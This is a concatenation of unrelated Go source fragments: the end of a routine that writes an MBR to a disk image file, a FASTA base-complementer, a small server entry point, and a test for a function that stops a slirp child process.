		copy(MBRAuxiliar.FCreacionMBR[:], Fecha.String())
		// Unique disk identifier.
		MBRAuxiliar.IDMBR = int64(rand.Intn(100000000))
		// Four empty partitions.
		MBRAuxiliar.Particion1MBR = Variables.ParticionEstructura{}
		MBRAuxiliar.Particion2MBR = Variables.ParticionEstructura{}
		MBRAuxiliar.Particion3MBR = Variables.ParticionEstructura{}
		MBRAuxiliar.Particion4MBR = Variables.ParticionEstructura{}
		// Serialize the MBR (big-endian) at offset 0.
		MBRDireccion := &MBRAuxiliar
		_ = binary.Write(&CadenaBinariaMBR, binary.BigEndian, MBRDireccion)
		Metodos.EscribirArchivoBinario(Archivo, CadenaBinariaMBR.Bytes())
		color.Success.Println("Disco Creado Con Exito!")
		fmt.Println("")
		_ = Archivo.Close()
	}
}
package glow
// baseConv maps an ASCII nucleotide byte to its complement
// (A<->T, C<->G). 'N' (unknown base) and '\n' map to themselves;
// every byte not listed maps to the zero byte.
var baseConv = [256]byte{
	'A': 'T',
	'T': 'A',
	'C': 'G',
	'G': 'C',
	'N': 'N',
	'\n': '\n',
}
// BaseComplementer reads sequence lines from In and emits their
// base-complemented copies on Out. Lines starting with '>' (presumably
// FASTA headers) pass through unchanged.
type BaseComplementer struct {
	In chan []byte
	Out chan []byte
}
// OutChan allocates the output channel (buffered to 16 entries) and
// returns it. Init sends on Out, so OutChan should be called first.
func (bc *BaseComplementer) OutChan() chan []byte {
	bc.Out = make(chan []byte, 16)
	return bc.Out
}
// Init starts a goroutine that consumes In, complements each
// non-header line in place via baseConv, and forwards a copy on Out.
// Out is closed once In is drained.
func (bc *BaseComplementer) Init() {
	go func() {
		for line := range bc.In {
			// Guard against empty lines: indexing line[0] on an empty
			// slice would panic. Header lines ('>') are passed through.
			if len(line) > 0 && line[0] != '>' {
				for pos := range line {
					line[pos] = baseConv[line[pos]]
				}
			}
			// Send a copy so the receiver owns its own buffer.
			bc.Out <- append([]byte(nil), line...)
		}
		close(bc.Out)
	}()
}
|
package main
import (
"log"
"github.com/sanjay/roam/pkg/server"
)
// Port is the TCP address (":3000") the server listens on.
const (
	Port = ":3000"
)
// main initializes the server and runs it on the configured port.
func main() {
	s, err := server.InitializeServer()
	if err != nil {
		// Exit immediately: continuing would call Run on a
		// possibly-nil server and panic.
		log.Fatalln("Cannot start server error: ", err)
	}
	s.Run(Port)
}
|
package main
import (
"fmt"
"io"
"os"
"os/exec"
"syscall"
"testing"
"time"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
// TestStopSlirp verifies that stopSlirp terminates a child process both
// when it exits gracefully on the termination signal and when it must be
// killed after ignoring termination signals.
func TestStopSlirp(t *testing.T) {
	for _, c := range [][]string{
		// Should terminate process gracefully
		{"/bin/sleep", "60"},
		// Should kill process after termination timeout
		{"/bin/sh", "-c", "sig() { echo signal received but refusing to terminate; sleep 60; }; trap sig 2 3 15; sleep 60 & wait"},
	} {
		// Run each case in its own closure so the deferred SIGKILL fires
		// at the end of the iteration rather than piling up until the
		// whole test returns.
		func() {
			fmt.Printf("Process: %+v\n", c)
			cmd := exec.Command(c[0], c[1:]...)
			// New process group so signals target the child, not the test.
			cmd.SysProcAttr = &syscall.SysProcAttr{Setpgid: true}
			stdout, err := cmd.StdoutPipe()
			require.NoError(t, err)
			stderr, err := cmd.StderrPipe()
			require.NoError(t, err)
			go func() { io.Copy(os.Stdout, stdout) }()
			go func() { io.Copy(os.Stderr, stderr) }()
			err = cmd.Start()
			require.NoError(t, err)
			pid := cmd.Process.Pid
			// Ensure the child is reaped even if assertions fail.
			defer syscall.Kill(pid, syscall.SIGKILL)
			go func() { cmd.Wait() }()
			// Give the child time to install its signal handlers.
			time.Sleep(300 * time.Millisecond)
			startTime := time.Now()
			stopCh := make(chan error)
			go func() { stopCh <- stopSlirp(pid) }()
			select {
			case err = <-stopCh:
				require.NoError(t, err, "stopSlirp()")
				fmt.Println("stopSlirp() returned after", time.Since(startTime).String())
				// Signal 0 probes existence: ESRCH means the process is gone.
				err = syscall.Kill(pid, syscall.Signal(0))
				assert.True(t, err == syscall.ESRCH, "process has not been terminated")
			case <-time.After(7 * time.Second):
				t.Errorf("timed out waiting for stopSlirp() to return")
				t.FailNow()
			}
		}()
	}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.